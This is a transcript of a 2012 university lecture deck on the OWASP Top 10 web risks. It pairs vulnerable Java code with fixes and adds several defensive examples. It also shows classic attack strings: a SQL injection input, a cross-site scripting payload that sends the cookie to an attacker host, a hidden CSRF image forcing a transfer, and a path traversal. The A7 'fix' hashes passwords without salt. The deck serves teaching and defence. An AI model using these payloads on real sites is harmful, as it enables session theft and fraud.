OWASP Top 10 Application Security Risks
Creative Commons Attribution-NonCommercial-ShareAlike License
    Presentation Transcript

    • OWASP Top 10 Application Security Risks, by Francesco Iovine, Università degli Studi di Roma "Tor Vergata", Faculty of Engineering, Computer and Internet Security course, 1 June 2012. http://www.flickr.com/photos/purpleslog/2880224058/
    • OWASP Top 10 Application Security Risks
      A1 | Injection
      A2 | Cross-Site Scripting
      A3 | Broken Authentication and Session Management
      A4 | Insecure Direct Object References
      A5 | Cross-Site Request Forgery (CSRF)
      A6 | Security Misconfiguration
      A7 | Insecure Cryptographic Storage
      A8 | Failure to Restrict URL Access
      A9 | Insufficient Transport Layer Protection
      A10 | Unvalidated Redirects and Forwards
    • +R | Risk Factors
    • http://www.flickr.com/photos/doug88888/4561376850/
    • A1 | Injection
      Java
        String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
      http://example.com/app/accountView?id=' or '1'='1
    • A1 | Injection
      Java
        String selectStatement = "SELECT * FROM User WHERE userId = ? ";
        PreparedStatement prepStmt = con.prepareStatement(selectStatement);
        prepStmt.setString(1, userId);
        ResultSet rs = prepStmt.executeQuery();
    • http://www.flickr.com/photos/dlombardia/7198892852/
    • A2 | Cross-Site Scripting
      Java
        page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
      '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
      JSP
        <% String name = resultSet.getString("name"); %>
        Employee Name = <%= name %>
      LINK
        http://example.com/page.htm?p=<script>attack(document.cookie)</script>
    • A2 | Cross-Site Scripting
      JSP
        <div> the name is <c:out value="${param.firstName}"/> </div>
      HTTP header / HTML meta element
        Content-Security-Policy: default-src 'self'; img-src *; object-src media1.example.com *.cdn.example.com; script-src trustedscripts.example.com
    • http://www.flickr.com/photos/ogimogi/2980070571
    • A3 | Broken Authentication and Session Management
      http://example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
    • A3 | Broken Authentication and Session Management
      Java
        public void logout() {
            HttpSession session = request.getSession(false);
            if (session != null) {
                session.invalidate();
            }
            loggedIn = false;
        }
    • http://www.flickr.com/photos/lovestruck94/4462625337
    • A4 | Insecure Direct Object References
      Java
        String query = "SELECT * FROM accts WHERE account = ?";
        PreparedStatement pstmt = connection.prepareStatement(query, ...);
        pstmt.setString(1, request.getParameter("acct"));
        ResultSet results = pstmt.executeQuery();
      http://example.com/app/accountInfo?acct=notmyacct
    • A4 | Insecure Direct Object References
      JEE Spring Framework, dispatcher.xml
        <bean id="userRoleAuthorizationInterceptor" class="com.example.UserRoleAuthorizationInterceptor" />
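An indirect reference map of the kind the OWASP remediation for A4 recommends, as an added example that is not from the slides: the client only ever sees a per-session random handle, and the real account ID bound into the prepared statement above never appears in the URL. The class name and the account IDs are constructed for illustration.

```java
import java.security.SecureRandom;
import java.util.HashMap;
import java.util.Map;

// Per-session map from random handles to real object IDs: the handle is what
// appears in acct=..., the real ID is what goes into the prepared statement.
public final class AccessReferenceMap {
    private static final SecureRandom RNG = new SecureRandom();
    private final Map<String, String> indirectToDirect = new HashMap<>();
    private final Map<String, String> directToIndirect = new HashMap<>();

    // Called while rendering: returns the handle to embed in links and forms.
    public String getIndirectReference(String directRef) {
        String handle = directToIndirect.get(directRef);
        if (handle == null) {
            do {
                handle = String.format("%016x", RNG.nextLong());
            } while (indirectToDirect.containsKey(handle));
            indirectToDirect.put(handle, directRef);
            directToIndirect.put(directRef, handle);
        }
        return handle;
    }

    // Called while handling a request: maps the handle back, failing closed
    // for any handle this session never issued (e.g. acct=notmyacct).
    public String getDirectReference(String indirectRef) {
        String direct = indirectToDirect.get(indirectRef);
        if (direct == null) {
            throw new SecurityException("unknown object reference");
        }
        return direct;
    }

    public static void main(String[] args) {
        // One map per authenticated session, seeded with that user's own
        // accounts (constructed sample IDs).
        AccessReferenceMap map = new AccessReferenceMap();
        String handle = map.getIndirectReference("ACCT-1001");
        System.out.println("/app/accountInfo?acct=" + handle);
        System.out.println(map.getDirectReference(handle));
        try {
            map.getDirectReference("notmyacct");
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```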
    • http://www.flickr.com/photos/brettdavis/3943432908
    • A5 | Cross-Site Request Forgery (CSRF)
      http://example.com/app/transferFunds?amount=1500&destAccount=4673243243
      HTML on attacker-website.com
        <img src="http://example.com/app/transferFunds?amount=1500&destAccount=attackersAcct#" width="0" height="0" />
    • A5 | Cross-Site Request Forgery (CSRF)
      Java
        // Generate an unpredictable per-session token and keep it server-side
        private String createToken(HttpSession session) {
            String token = java.util.UUID.randomUUID().toString();
            session.setAttribute("token", token);
            return token;
        }
      HTML
        <input type="hidden" name="token" value="${sessionObject.token}"/>
      Java
        public void doPost(...) {
            // Reject the request unless the submitted token matches the one in the session
            Object sessionToken = request.getSession().getAttribute("token");
            if (sessionToken == null || !sessionToken.equals(request.getParameter("token"))) {
                throw new SecurityException("CSRF token mismatch");
            }
            ...
        }
    • http://www.flickr.com/photos/learnscope/2547026015
    • A6 | Security Misconfiguration
      - Outdated development framework
      - Application server: default credentials
      - Web server: directory listing
      - Information in error messages
    • A6 | Security Misconfiguration
      web.xml
        <security-constraint>
          <web-resource-collection>
            <web-resource-name>SecureOrders</web-resource-name>
            <description>...</description>
            <url-pattern>/orders/*</url-pattern>
          </web-resource-collection>
          <auth-constraint>
            <role-name>assistant</role-name>
            <role-name>manager</role-name>
          </auth-constraint>
          <user-data-constraint>
            <description>SSL required</description>
            <transport-guarantee>CONFIDENTIAL</transport-guarantee>
          </user-data-constraint>
        </security-constraint>
    • http://www.flickr.com/photos/zebble/6786151
    • A7 | Insecure Cryptographic Storage
      - Data backups stored together with the key
      - Password database hashed without salt
      - SQL injection from front-end applications
    • A7 | Insecure Cryptographic Storage
      Java
        private String passwordDigest(String input) throws Exception {
            String output = null;
            byte[] text = input.getBytes();
            MessageDigest algorithm = MessageDigest.getInstance("SHA-256");
            algorithm.reset();
            algorithm.update(text);
            byte[] messageDigest = algorithm.digest();
            StringBuffer hexString = new StringBuffer();
            for (int i = 0; i < messageDigest.length; i++) {
                // Two upper-case hex digits per byte; the | 0x100 trick forces a leading digit
                hexString.append(Integer.toHexString((messageDigest[i] & 0xFF) | 0x100).toUpperCase().substring(1, 3));
            }
            output = hexString.toString();
            return output;
        }
    • http://www.flickr.com/photos/brewbooks/2591952795
    • A8 | Failure to Restrict URL Access
      http://www.example.com/app/getappInfo
      http://www.example.com/app/admin_getappInfo
    • A8 | Failure to Restrict URL Access
      http://www.example.com/openfile.jsp?file=report.pdf
      http://www.example.com/openfile.jsp?file=../../../../pvt-dir/pvt-file
      Java
        // Allow only simple "name.ext" file names (dot escaped; '-' placed so it is not read as a range)
        if (!filename.matches("^[a-z0-9_-]+\\.[a-z0-9]+$")) {
            throw new SecurityException("invalid file name");
        }
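Added example, not from the slides, that pairs the slide's file-name allow-list with a canonical-path check, so a request for a file outside the report directory is refused even if the regex is later loosened. The class name is hypothetical and the directory and file names are constructed.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public final class SafeFileOpener {
    private final Path baseDir;
    public SafeFileOpener(Path baseDir) throws IOException {
        this.baseDir = baseDir.toRealPath();   // canonical form: symlinks and ".." resolved
    }

    // Layer 1: the slide's character allow-list (dot escaped, '-' placed so it is not a range).
    public static boolean nameIsValid(String userFile) {
        return userFile != null && userFile.matches("^[a-z0-9_-]+\\.[a-z0-9]+$");
    }

    // Layer 2: canonical-path confinement, independent of layer 1. normalize() folds
    // any "..", startsWith() keeps the result under baseDir, toRealPath() catches symlinks.
    public Path confine(String userFile) throws IOException {
        Path candidate = baseDir.resolve(userFile).normalize();
        if (candidate.equals(baseDir) || !candidate.startsWith(baseDir)) {
            throw new SecurityException("path escapes " + baseDir);
        }
        if (Files.exists(candidate) && !candidate.toRealPath().startsWith(baseDir)) {
            throw new SecurityException("symlink escapes " + baseDir);
        }
        return candidate;
    }
    // What openfile.jsp should call: both layers, failing closed.
    public Path resolve(String userFile) throws IOException {
        if (!nameIsValid(userFile)) {
            throw new SecurityException("file name contains disallowed characters");
        }
        return confine(userFile);
    }

    public static void main(String[] args) throws IOException {
        Path dir = Files.createTempDirectory("reports");   // constructed stand-in for the report directory
        Files.write(dir.resolve("report.pdf"), new byte[0]);
        SafeFileOpener opener = new SafeFileOpener(dir);
        System.out.println(opener.resolve("report.pdf"));
        for (String bad : new String[] {"../../../../pvt-dir/pvt-file", "/etc/hosts", "report.pdf/.."}) {
            try {
                System.out.println(opener.confine(bad));   // layer 2 alone must still refuse these
            } catch (SecurityException e) {
                System.out.println("rejected " + bad + ": " + e.getMessage());
            }
        }
    }
}
```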
    • http://www.flickr.com/photos/clickclaker/6747794029
    • A9 | Insufficient Transport Layer Protection
      - Authentication without SSL: session cookie capture
      - Misconfigured SSL certificate: phishing
      - Cleartext connection to the database
    • A9 | Insufficient Transport Layer Protection
      web.xml
        <security-constraint>
          <web-resource-collection>
            <web-resource-name>Security page</web-resource-name>
            <url-pattern>/web/login/signup.jsp</url-pattern>
          </web-resource-collection>
          <user-data-constraint>
            <transport-guarantee>CONFIDENTIAL</transport-guarantee>
          </user-data-constraint>
        </security-constraint>
    • http://www.flickr.com/photos/nafmo/2226652256/
    • A10 | Unvalidated Redirects and Forwards
      - Redirect: http://www.example.com/redirect.jsp?url=evil.com
      - Forward: http://www.example.com/boring.jsp?fwd=admin.jsp
    • A10 | Unvalidated Redirects and Forwards
      JEE Spring Framework, WizardFormController
        1. http://www.example.com/transfer.htm
        2. http://www.example.com/transfer.htm?_target1=
        3. http://www.example.com/transfer.htm?_target2=
        4. http://www.example.com/transfer.htm?_target3=
        5. http://www.example.com/transfer.htm?_finish=
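Allow-list validation for the url= and fwd= parameters shown on the slide, as an added example that is not from the slides: redirects go only to site-relative paths or https URLs on allow-listed hosts, and forwards are looked up by key rather than by JSP path. The class name, hosts and forward keys are constructed; Set.of and Map.of need Java 9 or later.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Map;
import java.util.Set;

public final class RedirectValidator {
    // Constructed allow-list of hosts this application may redirect to.
    private static final Set<String> ALLOWED_HOSTS = Set.of("www.example.com", "shop.example.com");
    // Constructed forward map: the client names a key, never a JSP path.
    private static final Map<String, String> FORWARDS = Map.of("summary", "/summary.jsp", "help", "/help.jsp");
    // Target for redirect.jsp?url=...: a site-relative path or an https URL on an
    // allow-listed host; anything else (evil.com, //evil.com, user@evil.com) becomes "/".
    public static String safeRedirect(String url) {
        if (url == null || url.isEmpty()) {
            return "/";
        }
        URI uri;
        try {
            uri = new URI(url);
        } catch (URISyntaxException e) {
            return "/";                          // malformed input, e.g. backslashes
        }
        if (uri.getScheme() == null && uri.getRawAuthority() == null) {
            String path = uri.getRawPath();      // site-relative: exactly one leading '/'
            return (path != null && path.startsWith("/") && !path.startsWith("//")) ? url : "/";
        }
        String host = uri.getHost();
        if ("https".equalsIgnoreCase(uri.getScheme()) && host != null
                && ALLOWED_HOSTS.contains(host.toLowerCase())) {
            return url;
        }
        return "/";
    }
    // Target for boring.jsp?fwd=...: only keys present in FORWARDS are accepted, so a
    // client-supplied page name such as fwd=admin.jsp is never used as a path.
    public static String safeForward(String fwd) {
        String target = (fwd == null) ? null : FORWARDS.get(fwd);   // Map.of rejects null keys
        if (target == null) {
            throw new SecurityException("unknown forward target");
        }
        return target;
    }
    public static void main(String[] args) {
        String[] inputs = {"/account", "https://shop.example.com/cart", "evil.com",
                           "//evil.com", "https://www.example.com@evil.com/"};
        for (String u : inputs) {
            System.out.println(u + " -> " + safeRedirect(u));
        }
        System.out.println("fwd=summary -> " + safeForward("summary"));
    }
}
```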
    • OWASP Top 10 Application Security Risks
      A1 | Injection
      A2 | Cross-Site Scripting
      A3 | Broken Authentication and Session Management
      A4 | Insecure Direct Object References
      A5 | Cross-Site Request Forgery (CSRF)
      A6 | Security Misconfiguration
      A7 | Insecure Cryptographic Storage
      A8 | Failure to Restrict URL Access
      A9 | Insufficient Transport Layer Protection
      A10 | Unvalidated Redirects and Forwards
    • +R | Risk Factors
    • +D | Advice for developers
      - Application security requirements (ASVS)
      - Application security architecture (Developers Guide)
      - Standard security controls (ESAPI)
      - Secure development lifecycle (SAMM)
      - Application security knowledge (OWASP Education Project)
    • +V | Advice for testers
      - Get organized
      - Code review
      - Security and penetration testing
    • +O | Advice for organizations
      - Start the application security program right away
      - Risk-oriented approach
      - Establish a strong foundation for application security
      - Integrate security into existing processes
      - Give management visibility
    • References
      OWASP Top 10 Project: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
      OWASP Development Guide: https://www.owasp.org/index.php/OWASP_Guide_Project
    • Project 1, by Francesco Iovine http://www.flickr.com/photos/purpleslog/2880224058/
    • Web Application Security
      You are asked to provide a security assessment of a web application using the techniques presented.
      Which language/framework for the code?
      - Whichever the team is most comfortable with
      What kind of assessment?
      - focus on testing
      - focus on risk
      - focus on development following the OWASP guidelines
    • Web Application Security
      Which application?
      - OWASP Broken Web Application Project https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
      - Vulnerable Web Applications for Learning http://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/
      - A web application of your own, developed for other projects or written ad hoc.
      - If you choose a web application with a mobile front end, provide a security assessment of the whole system following the OWASP Mobile Security Project guidelines.
    • References
      OWASP Top 10 Project: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
      OWASP Testing Guide: https://www.owasp.org/index.php/OWASP_Testing_Project
      OWASP Development Guide: https://www.owasp.org/index.php/OWASP_Guide_Project
      OWASP Mobile Security Project: https://www.owasp.org/index.php/OWASP_Mobile_Security_Project
    • Credits: Simone Onofri, Marco Ramilli, Cinzia Querques